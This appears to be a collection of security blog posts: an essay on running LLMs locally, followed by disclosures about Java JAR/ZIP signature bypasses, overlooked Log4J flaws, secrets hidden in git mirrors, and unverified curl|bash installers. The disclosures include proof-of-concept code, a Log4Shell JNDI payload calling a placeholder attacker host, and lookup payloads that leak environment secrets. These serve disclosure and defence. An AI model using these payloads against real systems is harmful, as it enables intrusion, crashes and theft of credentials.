While the majority of GenAI investment / capex is focused on new datacenters, GPUs and hardware, is it possible that the long-term future of LLM inference and training is actually on local hardware we already have? Two trends worth tracking:
1. Better local stacks.
Our local desktops, laptops and mobile phones hide a surprising amount of compute capacity that often goes underused. For example, a recent paper estimated that M-series chips on Apple laptops can go as high as 2.9 TFLOPS for an M4, and Google’s Pixel 10 Android phone can in theory hit 1.5 TFLOPS (for comparison, an NVIDIA GeForce RTX 4090 GPU can reach 82 TFLOPS and the H100 67 TFLOPS, at FP32).
Local inference stacks like llama.cpp, Ollama and LM Studio have been getting better and better, with underlying improvements such as Apple’s support for inference via MLX, support for AMD GPUs, and integration into the overall ecosystem via things like MCPs, tools, local web interfaces for coding assistants, etc. All have been showing better and better performance over the past year. As an example, compare Cline’s recommendations for local models in May 2025:
When you run a “local version” of a model, you’re actually running a drastically simplified copy of the original. This process, called distillation, is like trying to compress a professional chef’s knowledge into a basic cookbook – you keep the simple recipes but lose the complex techniques and intuition. … Think of it like running your development environment on a calculator instead of a computer – it might handle basic tasks, but complex operations become unreliable or impossible.
with the more recent guidance: Local models with Cline are now genuinely practical. While they won’t match top-tier cloud APIs in speed, they offer complete privacy, zero costs, and offline capability. With proper configuration and the right hardware, Qwen3 Coder 30B can handle most coding tasks effectively. The key is proper setup: adequate RAM, correct configuration, and realistic expectations. Follow this guide, and you’ll have a capable coding assistant running entirely on your hardware.
Even OpenClaw (reluctantly) supports local models.
2. Model improvements including inference and training.
Because of pressure to squeeze better performance out of existing hardware, open source inference engines such as vLLM, frameworks such as PyTorch, and the models themselves have been focusing on faster inference speed and throughput. For example, vLLM recently announced a 38% performance improvement for OpenAI’s gpt-oss-120b model. What is more interesting, however, is fundamental changes in the models themselves. DeepSeek, for example, recently released a paper showing how to increase transformer performance via memory lookups. Several model providers, such as Google / Gemini and LiquidAI, have been releasing small models intended to run on limited hardware such as phones.
On the training side, Andrej Karpathy recently posted about how he managed to shrink the hardware needed to train GPT-2 from 32 TPUs down to a single 8×H100 node:
Seven years later, we can beat GPT-2’s performance in nanochat ~1000 lines of code running on a single 8×H100 GPU node for ~3 hours. At ~$24/hour for an 8×H100 node, that’s $73, i.e. ~600× cost reduction. That is, each year the cost to train GPT-2 is falling to approximately 40% of the previous year. (I think this is an underestimate and that further improvements are still quite possible).
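As a quick sanity check on that rate (back-of-the-envelope arithmetic, not from the original post), a ~600× reduction over seven years corresponds to:

```latex
600^{1/7} \approx 2.5
\quad\Rightarrow\quad
\text{yearly cost} \approx \tfrac{1}{2.5} \approx 40\% \text{ of the previous year},
\qquad (0.4)^7 \approx \tfrac{1}{610} \approx \tfrac{1}{600}
```

so the "40% per year" figure is consistent with the overall 600× claim.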
These improvements will trickle down to local hardware as well over time.
Implications for security and other things
If the long-term picture consists of models running locally on the hardware the rest of the stack runs on, the security of those models starts to look very different. For example, in an enterprise environment it is possible today to monitor and block network connectivity to outside model providers like OpenAI, Anthropic, etc.; but if everything is running locally, the goal of network security would instead be to look for large downloads of model weights and to scan local hardware for models or excessive GPU usage. Second, centralized controls over which models someone can use won’t work anymore if those models are running locally – instead, deploying those controls starts to look like what we do today for locally-installed software, with OS-level scanning and reporting. Third, supply chain issues with models – malicious models, updating insecure models, etc. – suddenly become very important, again requiring us to borrow the tricks we use today for local software and open source dependencies.
For all of the new data centers being built – is there truly a need if existing local hardware can eventually do the job?
“This building is protected by a very secure system … But like all systems it has a weakness. The system is based on the rules of a building. One system built on another.” (Keymaker – “The Matrix Reloaded”)
Summary
Six issues related to how Java handles JAR files, ZIP files and digital signatures in JAR files were reported to and fixed by OpenJDK / Oracle. These could be used to hide malicious files inside JARs, bypass digital signatures and overwrite existing content. One of the issues was assigned a CVE (CVE-2024-20932) and the rest were fixed without CVE assignments.
Technical Details
The Java programming language supports the use of digital signatures to validate the authenticity of Java class files packaged into JAR files (JAR = Java ARchive). JARs are based on the ZIP file format, with the addition of a signature scheme that embeds a set of special manifest files inside the archive itself; these contain digital signatures covering the rest of the files in the archive (unlike detached signature schemes such as PGP or sigstore). This design can lead to security issues related to how the manifest files, or other files in the archive, are stored and processed.
Java also includes a number of classes and CLI utilities dealing with JAR files – all supporting digital signature validation:
JarInputStream – reads ZIP files in streaming mode, ignoring the central directory
jar (cli) – used to create, update and extract JARs
jarsigner (cli) – used to sign and verify digital signatures for JAR files
A key point to keep in mind regarding ZIP is that entries appear twice: throughout the file as local headers, and in an index located at the end of the file (the central directory). Normal processing reads the central directory and references entries from there, but it is also possible to process ZIP files in “streaming” mode, ignoring the central directory and reading the entries directly. Exploiting the differences between the two approaches can introduce a number of security issues. A good overview of this, the ZIP format and various ZIP attacks can be found here: https://www.youtube.com/watch?v=8Uue8tARdNs.
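The two read paths map directly onto different JDK classes. A minimal sketch contrasting them (the file name is arbitrary):

```java
import java.io.*;
import java.util.zip.*;

public class ZipReadModes {
    public static void main(String[] args) throws Exception {
        // Build a small ZIP to read back
        try (ZipOutputStream zos = new ZipOutputStream(new FileOutputStream("sample.zip"))) {
            zos.putNextEntry(new ZipEntry("a.txt"));
            zos.write("hello".getBytes());
            zos.closeEntry();
        }

        // Streaming mode: walks the local headers front to back and never
        // consults the central directory (JarInputStream behaves this way too)
        try (ZipInputStream zis = new ZipInputStream(new FileInputStream("sample.zip"))) {
            for (ZipEntry e; (e = zis.getNextEntry()) != null; ) {
                System.out.println("local: " + e.getName());
            }
        }

        // Central-directory mode: reads the index at the end of the file
        // and resolves entries from there
        try (ZipFile zf = new ZipFile("sample.zip")) {
            zf.stream().forEach(e -> System.out.println("central: " + e.getName()));
        }
    }
}
```

A crafted archive can make these two views disagree, which is the root of several of the issues below.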
Issue #1 – Duplicate File Handling in jar CLI
The Java jar cli did not correctly handle the case where two entries with the same file name appear in the same JAR file. This could be exploited to hide a malicious file as a second duplicate entry, to overwrite a legitimate file already in the JAR, or to bypass signature validation. This issue was fixed by adding detection for this edge case on May 28th, 2025 and the fix was shipped in the following JDK version: 25. See release notes:
“The jar --validate command has been enhanced to identify and generate a warning message for: … Duplicate entry names”
The following Java code can be used to generate a proof-of-concept JAR:
import java.io.*;
import java.util.zip.*;
import java.lang.reflect.*;

public class CreateDuplicateJar {
    public static void main(String[] args) throws Exception {
        FileOutputStream fos = new FileOutputStream("duplicate.jar");
        ZipOutputStream zos = new ZipOutputStream(fos);

        zos.putNextEntry(new ZipEntry("Test.class"));
        zos.write("first".getBytes());
        zos.closeEntry();

        // Clear the internal "names" HashSet to allow a duplicate entry name
        Field namesField = ZipOutputStream.class.getDeclaredField("names");
        namesField.setAccessible(true);
        ((java.util.HashSet) namesField.get(zos)).clear();

        zos.putNextEntry(new ZipEntry("Test.class"));
        zos.write("second".getBytes());
        zos.closeEntry();
        zos.close();
    }
}
You can test this on a fixed version of the JDK (25) by running the validate command:
jar --validate duplicate.jar
Issue #2 – Overwriting existing files via jar CLI (-x)
The Java jar cli includes an extract (-x) option which extracts files to the file system. The tool did not check whether the files being extracted would overwrite files already present. This can be exploited to overwrite security-sensitive files without the user’s knowledge. The issue was fixed by adding a new option (--keep-old-files / -k) which prevents overwriting of files. This was fixed on October 23rd, 2024 and shipped in the following JDK versions: 21.0.6, 17.0.14, 11.0.27 and 8u452. The following was added to the release notes:
“The jar tool’s extract operation has been enhanced to allow the --keep-old-files and the -k options to be used in preventing the overwriting of existing files. … Either of these commands will extract the contents of foo.jar. If an entry with the same name already exists in the target directory, then the existing file will not be overwritten.”
The following shell script can be used as proof of concept:
Issue #3 – File and directory entries with the same name (CVE-2024-20932)
The ZIP classes in Java failed to correctly handle an edge case where two entries with the same name exist in a ZIP file, one as a file and the other as a directory. This can be exploited to bypass certain restrictions or hide malicious data. This was fixed on January 9th, 2024 and shipped in the following JDK version: 17.0.10. CVE-2024-20932 was assigned to this issue:
“It was discovered that the Libraries component in OpenJDK failed to properly handle ZIP archives that contain a file and directory entry with the same name within the ZIP file. This could lead to integrity issues when extracting data from such archives. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.”
The following Java code is a proof of concept for this issue:
import java.io.*;
import java.util.zip.*;

public class ZipDuplicateEntryPOC {
    public static void main(String[] args) throws Exception {
        String zipName = "poc.zip";
        // Create ZIP with both "test" file and "test/" directory
        try (ZipOutputStream zos = new ZipOutputStream(new FileOutputStream(zipName))) {
            zos.putNextEntry(new ZipEntry("test"));
            zos.write("data".getBytes());
            zos.closeEntry();
            zos.putNextEntry(new ZipEntry("test/"));
            zos.closeEntry();
        }
    }
}
Issue #4 – Incorrect handling of duplicate manifest files (JarInputStream)
The JarInputStream class incorrectly handled cases where the manifest appears twice in the same JAR file with regard to digital signatures. This was fixed on April 16th, 2025 and shipped in the following JDK versions: 21.0.7, 17.0.15, 11.0.27 and 8u452. See release notes:
“The JarInputStream class now treats a signed JAR as unsigned if it detects a second manifest within the first two entries in the JAR file. A warning message "WARNING: Multiple MANIFEST.MF found. Treat JAR file as unsigned." is logged if the system property, -Djava.security.debug=jar, is set.”
No POC code is available
Issue #5 – Digital signature bypass via local/central header confusion
The various CLIs and classes handling JAR files read file entries either in streaming mode (local headers) or via the central directory. An attacker can exploit the differences between the various implementations by adding file entries to the local headers that will pass digital signature validation based on the central directory, and then be extracted when local headers / streaming mode is used. This issue was fixed by adding detection for this edge case on May 28th, 2025 and the fix was shipped in the following JDK version: 25 b26. See release notes:
“The jar --validate command has been enhanced to identify and generate a warning message for … Inconsistencies in the ordering of entries between the LOC and CEN headers”
No POC code is available
Issue #6 – No detection of signed content being removed (jarsigner)
The Java jarsigner cli failed to detect when a digitally signed JAR file had some file entries removed. This can be exploited to impact security by removing service provider classes or security policy files. The issue was fixed by adding detection of deleted content that was digitally signed and the fix was shipped in the following JDK versions: 21.0.8, 17.0.16, 11.0.28 and 8u462. This was fixed on October 2nd, 2024 – see release notes:
“If an entry is removed from a signed JAR file, there is no mechanism to detect that it has been removed using the JarFile API, since the getJarEntry method returns null as if the entry had never existed. With this change, the jarsigner -verify command analyzes the signature files and if some sections do not have matching file entries, it prints out the following warning: “This JAR contains signed entries for files that do not exist”. Users can further find out the names of these entries by adding the -verbose option to the command.”
The following shell script can be used as a proof of concept (setup commands reconstructed from the cleanup step; file and alias names assumed):
# Setup: create and sign a JAR containing secret.txt
echo "normal" > normal.txt
echo "secret" > secret.txt
keytool -genkeypair -alias poc -keyalg RSA -keystore keystore.jks -storepass changeit -dname "CN=poc"
jar cf app.jar normal.txt secret.txt
jarsigner -keystore keystore.jks -storepass changeit app.jar poc
echo -e "\n[!] ATTACK: Removing secret.txt from signed JAR..."
zip -d app.jar secret.txt
echo -e "\n[*] Verifying JAR after removal..."
jarsigner -verify app.jar
echo -e "\n[*] Checking JAR contents..."
jar tf app.jar
echo -e "\n[!] Result: JAR still appears signed but secret.txt is gone!"
echo "[!] The signature for secret.txt remains in META-INF/*.SF"
echo "[!] This could hide evidence of file removal or tampering"
# Cleanup
rm -f secret.txt normal.txt app.jar keystore.jks
Disclosure Information and References
With the exception of issue #3 above (CVE-2024-20932), the remaining issues were not issued CVEs, and some received an in-depth security fix acknowledgement from Oracle / OpenJDK.
The fixes for the original four Log4Shell vulnerabilities in Log4J v2, discovered and patched in December 2021, also quietly covered two additional vulnerabilities that were not publicly known at the time: a denial of service and an information disclosure. The root cause of these issues is other string lookups in the Log4J library. They were publicly disclosed by the vendor in September 2022 via documentation updates and are considered by the vendor to be part of the original four issues, so no code changes are planned and no new CVEs were issued.
Previously recommended mitigations that were widely used (such as removing the JndiLookup class) are insufficient to fix these issues, and users relying on those mitigations should update to a patched version as soon as possible. Systems that provide access to the Log4J configuration files remain vulnerable.
About Log4J, Log4Shell and Related CVEs
Logging is a fundamental requirement in software development. While Java has provided a logging API since Java 1.4 (2002), Log4J has existed since 1999 and offers many more features. It is also more popular than other frameworks, leading to its use in a large number of Java applications. In December 2021, a number of serious security vulnerabilities were disclosed and patched in Log4J, with the most critical one allowing a remote attacker to achieve remote code execution.
These included:
CVE-2021-44228 (CVSS 10.0) aka “Log4Shell” – “allows Lookup expressions in the data being logged exposing the JNDI vulnerability”
CVE-2021-45046 (CVSS 10.0) – “When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern”
CVE-2021-44832 (CVSS 6.6) – “an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI”
CVE-2021-45105 (CVSS 5.9) – “did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.”
The timeline of the disclosure for these issues is as follows (from CSRB public report, page 3):
The core cause of these four issues is string lookups, which enabled attackers to inject unvalidated data into an application and exploit lookups, similar to SQL injection. The most severe of these exploits enables attackers to load code from a remote server via JNDI and execute it (RCE) – aka Log4Shell.
An example payload for Log4Shell via the JNDI lookup type (a typical form, with a hypothetical attacker server):
${jndi:ldap://attacker.example.com/a}
Here is an illustration of a Log4J attack pattern (from the HHS report, page 19):
The patches were released according to the following timeline:
Date         Version Released   CVEs Fixed       Notes
2021-12-10   2.15.0*            CVE-2021-44228   Fix for main Log4Shell issue; disables lookups but allows them to be re-enabled via a property
2021-12-13   2.16.0*            CVE-2021-45046   Fix for context lookups issue; disables lookups for logged data
2021-12-18   2.17.0             CVE-2021-45105   Fix for denial of service issue; disables most recursive lookups
2021-12-28   2.17.1             CVE-2021-44832   Fix for configuration file issue; limits JNDI context URL to “java”
Shortly after these releases, Amazon’s Corretto team released a hotpatch containing fixes for the two Log4Shell issues (CVE-2021-44228 and CVE-2021-45046) that could be applied to a running JVM as an agent (see blog post and GitHub repository). The other issues were not covered by the hotpatch.
As of December 2021, the following mitigations were recommended by the vendor (Apache) if users were unable to upgrade (see archived security page from Jan 2022):
For the Log4Shell issues (CVE-2021-44228 and CVE-2021-45046) – “in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class”
See also the hotpatch option above
For context lookup related issues (CVE-2021-45046 and CVE-2021-45105):
“In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).”
“Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.”
String Interpolation, Java EE and How They Intersect
One of the features found in Log4J and other Java libraries is property substitution (aka lookups or message interpolation). It enables placeholders like ${xxx:yyy} to be replaced with other values, similar to shell and programming languages. In Log4J, lookups are used to make configuration easier and are meant to be used in configuration files, not in the data being logged. They were added to Log4J in v2.0 (October 2010). At some point, lookups were changed to allow interpolation against incoming data being logged (most likely in October 2011). Over time additional lookup classes were added, and JNDI lookups arrived in July 2013. The JNDI code connects to legacy Java EE code from the 1990s.
Unfortunately, if not used properly, this functionality can lead to security issues. The root cause for these issues is that there were multiple systems that should not have been connected:
String lookups in config files.
Processing of incoming log messages with untrusted data.
Legacy 1990s Java EE/JNDI code.
The following is the code from the MessagePatternConverter class which processes incoming log messages. As you can see, it looks for “$” and passes the call to the StrSubstitutor class:
for (int i = offset; i < workingBuilder.length() - 1; i++) {
    if (workingBuilder.charAt(i) == '$' && workingBuilder.charAt(i + 1) == '{') {
        final String value = workingBuilder.substring(offset, workingBuilder.length());
        workingBuilder.setLength(offset);
        workingBuilder.append(config.getStrSubstitutor().replace(event, value));
    }
}
The StrSubstitutor class is the main entry point into lookup functionality within Log4J. It relies on the StrLookup interface, which is implemented by many classes, each providing a different type of lookup (most are in the org.apache.logging.log4j.core.lookup package). These get loaded via a plugin architecture and create connections to other components (custom lookups are also supported). One of the lookups provides Java Naming and Directory Interface (JNDI) support – as implemented in the JNDILookup class.
The following is the StrLookup interface, which provides a simple way to do lookups:
public interface StrLookup {
    String lookup(String key);
    String lookup(LogEvent event, String key);
}
And this code in the JNDILookup class creates a bridge between lookups and the legacy JNDI (Java EE) code still lingering in Java:
public String lookup(final LogEvent event, final String key) {
    if (key == null) {
        return null;
    }
    final String jndiName = convertJndiName(key);
    try (final JndiManager jndiManager = JndiManager.getDefaultManager()) {
        return Objects.toString(jndiManager.lookup(jndiName), null);
    } catch (final NamingException e) {
…
Technical Details – Vulnerability #1 – Denial of Service
Many of the string lookup types in Log4J are recursive and can be nested inside other lookups (see code here). Each nested function call uses part of Java’s stack memory, which is distinct from the main (heap) memory used for the majority of processing. Stack memory is configured via the “-Xss” parameter and defaults to anywhere between 1 MB and 1 GB depending on OS and Java version. Exceeding this memory results in a StackOverflowError.
While recursive lookups are mentioned in CVE-2021-45105, that CVE was thought to be limited to non-standard configurations involving context lookups. However, it turns out that this issue can be exploited in default configurations, similar to Log4Shell, by sending a malicious payload to a system that will try to log it. This was fixed when lookups were disabled; however, previous versions, and any systems exposing the Log4J configuration, remain vulnerable in default configurations. A recursive payload sent to an impacted application will be processed by Log4J recursively until the application runs out of stack memory.
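Such a payload can be generated programmatically. A sketch of a builder that wraps ${java:runtime} in repeated ${lower:...} lookups (a depth of 100 produces the 915-character payload whose crash appears further down):

```java
// Each nesting level forces one more recursive substitution when a
// vulnerable Log4J version interpolates the string.
public class RecursivePayload {
    public static void main(String[] args) {
        int depth = 100;
        StringBuilder payload = new StringBuilder("${java:runtime}");
        for (int i = 0; i < depth; i++) {
            payload.insert(0, "${lower:").append("}");
        }
        // 15 chars for ${java:runtime} plus 9 per level: 15 + 100*9 = 915
        System.out.println("Payload size: " + payload.length());
    }
}
```

Raising the depth until the payload exceeds the configured -Xss stack budget triggers the StackOverflowError.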
You can check the size of the stack memory in Java via the following command:
java -XX:+PrintFlagsFinal -version | grep ThreadStackSize
In a normal version, the inner lookup ( ${java:runtime} ) will return the build information about the JVM while the outer lookups ( ${lower:xxx} ) will convert the information to lower case as follows:
However, in a Java configuration with insufficient stack memory and a vulnerable Log4J version, it will crash as follows:
Payload size: 915
Exception in thread "main" java.lang.StackOverflowError
	at java.base/java.lang.AbstractStringBuilder.checkRangeSIOOBE(AbstractStringBuilder.java:1809)
	at java.base/java.lang.AbstractStringBuilder.getChars(AbstractStringBuilder.java:508)
	at java.base/java.lang.StringBuilder.getChars(StringBuilder.java:91)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.getChars(StrSubstitutor.java:1401)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:939)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:978)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:978)
Technical Details – Vulnerability #2 – Information Disclosure
The JNDI lookup turned out to be dangerous – but it’s just one of many lookup types available in Log4J. While the fixes for Log4Shell disable lookup interpolation in log messages, in versions prior to 2.15 all lookups are available. Even today, lookups remain available in configuration files – including in the latest versions of Log4J (since access to the configuration files is outside the threat model for the project). Additionally, lookups remain available if the JndiLookup class is removed (as per the recommended mitigation back in 2021, a common way to avoid upgrading the Log4J library).
In these three scenarios (versions prior to 2.15, versions with the JndiLookup class removed, or any version with access to the configuration files), other lookup types remain available and can leak information about the underlying system.
The following lookup types are available in Log4J (see documentation):
Pattern               Description
${bundle:xxx:xxx}     Resource bundles
${ctx:xxx}            Thread context map
${date:xxx}           Date/time
${docker:xxx}         Docker attributes
${env:xxx}            Environment variables
${event:xxx}          Log event object fields
${java:xxx}           Java runtime information
${jndi:xxx}           JNDI remote lookups
${jvmrunargs:xxx}     JVM runtime args (JMX only)
${k8s:xxx}            Kubernetes container information
${log4j:xxx}          Log4J configuration properties
${lower:xxx}          Converts to lower case
${main:xxx}           Executable arguments / main()
${map:xxx}            Map lookup
${marker:xxx}         Markers
${sd:xxx}             Structured data
${spring:xxx}         Spring properties
${sys:xxx}            System properties
${upper:xxx}          Converts to upper case
${web:xxx}            Servlet context variables/attributes
Many of the available lookups return information such as environment variables, system properties, Spring properties, runtime information, secrets, etc. Lookups that return data such as runtime attributes can be used for initial information gathering by a third party. However, most of the lookups do not support wildcards – the name of the variable, property, etc. being retrieved must be known.
Furthermore, access to the logs is required to read the information from these lookups, so the attacker cannot execute this attack blindly. Scenarios with access would include error messages, or cloud/SaaS applications where users have access to the resulting logs. An example of such a scenario:
Exploit example
Payload examples:
Pattern                              Description
${env:POSTGRES_PASSWORD}             Postgres password stored in an environment variable
${log4j:log4j2.trustStorePassword}   Keystore password from Log4J properties
${spring:spring.mail.password}       SMTP password from Spring
${docker:containerName}              Container name in Docker
${k8s:masterUrl}                     Kubernetes master URL
${java:runtime}                      Runtime information about the JVM
Code to test the exploit:
import org.apache.logging.log4j.LogManager;

public class Test2 {
    public static void main(String[] args) {
        String payload = "${java:runtime}";
        LogManager.getRootLogger().error(payload);
    }
}
In a patched version, the lookup will not work since all lookups are disabled and the following output will be produced:
This issue was publicly disclosed by Apache / the Log4J project in September 2022, as part of the Log4J v2.19 release. This was done via an update to the security page (see archived security page and Git update). Because the Log4J project considers these to be part of CVE-2021-45046 and CVE-2021-44228, as well as fixed in previous releases, no new CVEs were issued and no code changes were made. At the time of writing (June 2025), the CVE descriptions had not been fully updated in the NVD / CVE database but do appear on the Log4J security page. The previous mitigation information about removing the JndiLookup class has been removed from the Log4J security page.
NOTE: many vendors using Log4J in their products publicly advertised the removal of the JndiLookup class as a mitigation. Those vendors, if they have not upgraded, remain vulnerable to the two issues in this post. Additionally, products/services allowing access to the Log4J config files remain vulnerable even in the most recent versions.
Affected Versions
All versions of Log4J v2 prior to v2.15, except for v2.12.2-4 (Java 7) and v2.3.1-2 (Java 6).
In versions v2.15, v2.12.2 (Java 7) and v2.3.1 (Java 6), lookups in log messages are disabled by default but can be re-enabled. If lookups are re-enabled or context lookups are used (CVE-2021-45046), these versions are impacted.
Versions v2.16+, v2.12.3+ (Java 7) and v2.3.2 (Java 6) remain vulnerable if access is granted to the configuration files.
Log4J v1 should not be impacted except when JMSAppender is used (see CVE-2021-4104).
Users should upgrade to a version that disables lookups entirely for log messages – v2.16+, v2.12.3 (Java 7) or v2.3.2 (Java 6). Other tools such as WAF and IDS systems should be updated with signatures that detect these attack patterns.
For users unable to upgrade, the mitigations previously recommended by the vendor will not protect against these issues. While it might be possible to backport existing patches to disable lookups, this is not recommended. Other public mitigations, such as the Java hotpatch agent referenced above, do not address these issues.
Access to Log4J configuration files should not be allowed – lookups are still available in configuration files and there might be other attack vectors. Note that as of February 2023, security reports assuming access to the Log4J configuration “no longer qualify as vulnerabilities”.
CVE-2021-44228 – “JNDI lookup can be exploited to execute arbitrary code loaded from an LDAP server”
CVE-2021-44832 – “Remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source”
CVE-2021-45046 – “Information leak and remote code execution in some environments and local code execution in all environments”
CVE-2021-45105 – “An attacker with control over Thread Context Map data can cause a denial of service when a crafted string is interpreted”
Acknowledgements
The author would like to thank everyone who was involved in the disclosure process for these issues – you know who you are. Thank you to LTS for putting up with this for so long.
Timeline
2021-12-09: Original Log4Shell disclosure and fix by the vendor (Apache)
2022-09-10: Public disclosure of these two vulnerabilities by the vendor (Apache)
2024-11-08: Public talk about these issues at BSides Delaware 2024
The bootstrap process for Google’s Cloud SQL Proxy CLI uses the “curl | bash” pattern and did not document a way to verify the authenticity of the downloaded binaries. The vendor updated the documentation with information on how to use checksums to verify the downloaded binaries.
2022-08-30: Initial report to the vendor
2022-08-30: Vendor acknowledged the report
2022-09-27: Vendor rejected the report as a security issue
2023-03-03: Vendor reported that a fix has been implemented
2023-03-19: Public disclosure
Due to a discrepancy in Git behavior, only part of a source code repository is copied when using the “git clone” command. Additional parts of the repository become visible only when using the “--mirror” option. This can lead to secrets being exposed via Git repositories when not removed properly, and to a false sense of security when repositories are scanned for secrets against a cloned, non-mirrored copy.
Attackers and bug bounty hunters can use this discrepancy in Git behavior to find hidden secrets and other sensitive data in public repositories.
Organizations can mitigate this by analyzing a fuller copy of their repositories using the “--mirror” option and removing sensitive data using tools like BFG or git-filter-repo (which do a more thorough job).
Git is a popular open source tool used for version control of source code. When users make a copy of a local or remote Git repository, they use the “git clone” command. However, this command does not copy all of the data in the originating repository, such as deleted branches and commits. On the other hand, there is a “--mirror” option which copies more parts of the repository. The discrepancy between the two behaviors can lead to secrets and other sensitive data lingering in the original repository. Additionally, existing tools for secrets detection often operate on cloned repositories and do not detect secrets in the mirror-only portion of the repository unless it is cloned via the “--mirror” option.
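The mechanics are visible in the refspecs the two modes use: a plain clone fetches only refs/heads/* and refs/tags/*, while --mirror fetches +refs/*:refs/*. A self-contained sketch (all names made up) that parks a "secret" commit under a non-branch ref:

```shell
set -e
dir=$(mktemp -d) && cd "$dir"

# Origin repository where a secret commit is reachable only via a non-branch ref
git init -q origin
cd origin
git config user.email poc@example.com
git config user.name poc
git commit -q --allow-empty -m "init"
echo "hunter2" > secret.txt
git add secret.txt
git commit -qm "add secret"
git update-ref refs/hidden/leak HEAD   # keep the commit alive outside refs/heads
git reset -q --hard HEAD~1             # "remove" the secret from the branch
cd ..

# Plain clone over the git transport: refs/hidden/* is not fetched
git clone -q "file://$dir/origin" plain
# Mirror clone: fetches every advertised ref, including refs/hidden/leak
git clone -q --mirror "file://$dir/origin" mirror.git

git -C plain for-each-ref                            # only branch/tag refs
git -C mirror.git show refs/hidden/leak:secret.txt   # prints hunter2
```

The file:// URL forces the network transport (avoiding the local hardlink shortcut), so the plain clone genuinely never receives the secret objects, which is why scanners run against it come up clean.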
We also tested forking in GitHub and GitLab, and in both systems forking uses the regular “git clone” behind the scenes and not the “–mirror” version. That means that repositories containing secrets in the mirrored portion will not propagate those secrets to their forks.
We provide two examples of repositories containing hidden secrets that are only visible when cloning with the “--mirror” option. These can be found here:
gb_testrepo_reset – secret is retained after the git history is reset
If you try to clone the repository without the “--mirror” option and retrieve the secret, it will not work:
And:
If you try the same with the “--mirror” option, you can now retrieve the secret (also note the larger number of objects retrieved):
And:
If you run gitleaks on the cloned repositories, no secrets are found:
However, running gitleaks on the mirrored copies finds the secrets stashed in deleted areas:
Tooling
There are plenty of existing tools out there that can manipulate git repositories, scan them for secrets and remove specific commits. During our research, we used git for checking out repositories, git-filter-repo for figuring out the delta between cloned and mirrored copies of the same repository, and gitleaks to scan for secrets.
For examples on how to use these tools, please see sample scripts that we have published to GitHub.
Mitigations
Organizations can mitigate this by analyzing a larger part of their repositories using the “--mirror” option and removing sensitive data using tools like BFG or git-filter-repo. Garbage collection and pruning in Git are also recommended.
Organizations should not analyze regular cloned copies (made without the “--mirror” option), since that may provide a false sense of security, and should not rely on removal methods such as deleting a branch or rewinding history via the “git reset” command.
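As a local illustration of why rewinding history alone is insufficient, the sketch below (fake token, illustrative names) rewinds past a secret commit, shows it still sits in the object database, and only removes it with reflog expiry plus pruning:

```shell
#!/bin/sh
# After "git reset", the secret commit still lives in the object database;
# reflog expiry plus aggressive pruning is what actually deletes it.
set -e
tmp=$(mktemp -d); cd "$tmp"
git init -q -b main repo && cd repo
git -c user.email=a@b.c -c user.name=dev commit -q --allow-empty -m "base"
echo "token=FAKE-SECRET" > creds.txt         # fake secret, illustrative only
git add creds.txt
git -c user.email=a@b.c -c user.name=dev commit -q -m "add creds"
secret=$(git rev-parse HEAD)
git reset -q --hard HEAD~1                   # rewind history past the secret

git cat-file -e "$secret" && echo "after reset: secret commit still stored"

git reflog expire --expire=now --all         # drop reflog references to it
git gc --prune=now --quiet                   # prune now-unreachable objects

git cat-file -e "$secret" 2>/dev/null \
  && echo "after gc: secret still stored" || echo "after gc: secret commit gone"
```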
Branding
There seems to be a recent trend to name vulnerabilities. While we think it’s silly, why not go with the flow?
Therefore we named this one “GitBleed”, since it leads to bleeding of secrets from repositories – with a mirrored logo, since it involves mirrored repositories.
The bootstrap process for the Oracle Cloud CLI, which uses the “curl | bash” pattern, was insecure since there was no way to verify the authenticity of the downloaded binaries. The vendor is now publishing checksums that can be used to verify them.
Vulnerability Details
As part of our ongoing research into supply chain attacks, we have been analyzing bash installer scripts that use the “curl | bash” pattern. Oracle provides such a script to install the CLI command for interacting with Oracle Cloud. However, there was no way to check whether the files that the script downloads are legitimate, which could expose the end user to supply chain attacks. The installer is run as follows:
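The general remediation pattern for “curl | bash” installers is to publish checksums and verify the download before executing it. A minimal local sketch of that pattern follows; the file names are illustrative stand-ins, not Oracle’s actual artifacts, and in practice the checksum must come from a trusted channel separate from the download itself:

```shell
#!/bin/sh
# Sketch: verify a downloaded installer against a published checksum
# before running it, instead of piping it straight into bash.
set -e
tmp=$(mktemp -d); cd "$tmp"
printf '#!/bin/sh\necho "installing..."\n' > install.sh   # stands in for the download
sha256sum install.sh > install.sh.sha256                  # stands in for the vendor-published checksum
sha256sum -c install.sh.sha256                            # verify before executing
echo "checksum verified: safe to execute"
```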
2021-04-21: Initial report to the vendor
2021-04-21: Vendor acknowledged the report
2021-05-04: Vendor communicated that a fix is pending
2021-12-28: Vendor reported that a fix has been implemented and credit will be provided in an advisory
2022-01-18: Vendor advisory published
2022-02-06: Public disclosure
Over the last few weeks, security teams everywhere have been busy patching the Log4j vulnerabilities. In this article we cover three things you can tell your friends about why this one is way worse.
Ubiquity
This vulnerability impacts Java applications, and those can be found almost anywhere: enterprise software, vendor applications, database drivers, Android phones and even the smart chip on the credit card in your wallet (Java Card). Additionally, the majority of Java applications use log4j to handle logging, often of user input. While your phone is probably not exploitable, the sheer number of places where log4j can be hiding makes this hard to fix.
Severity
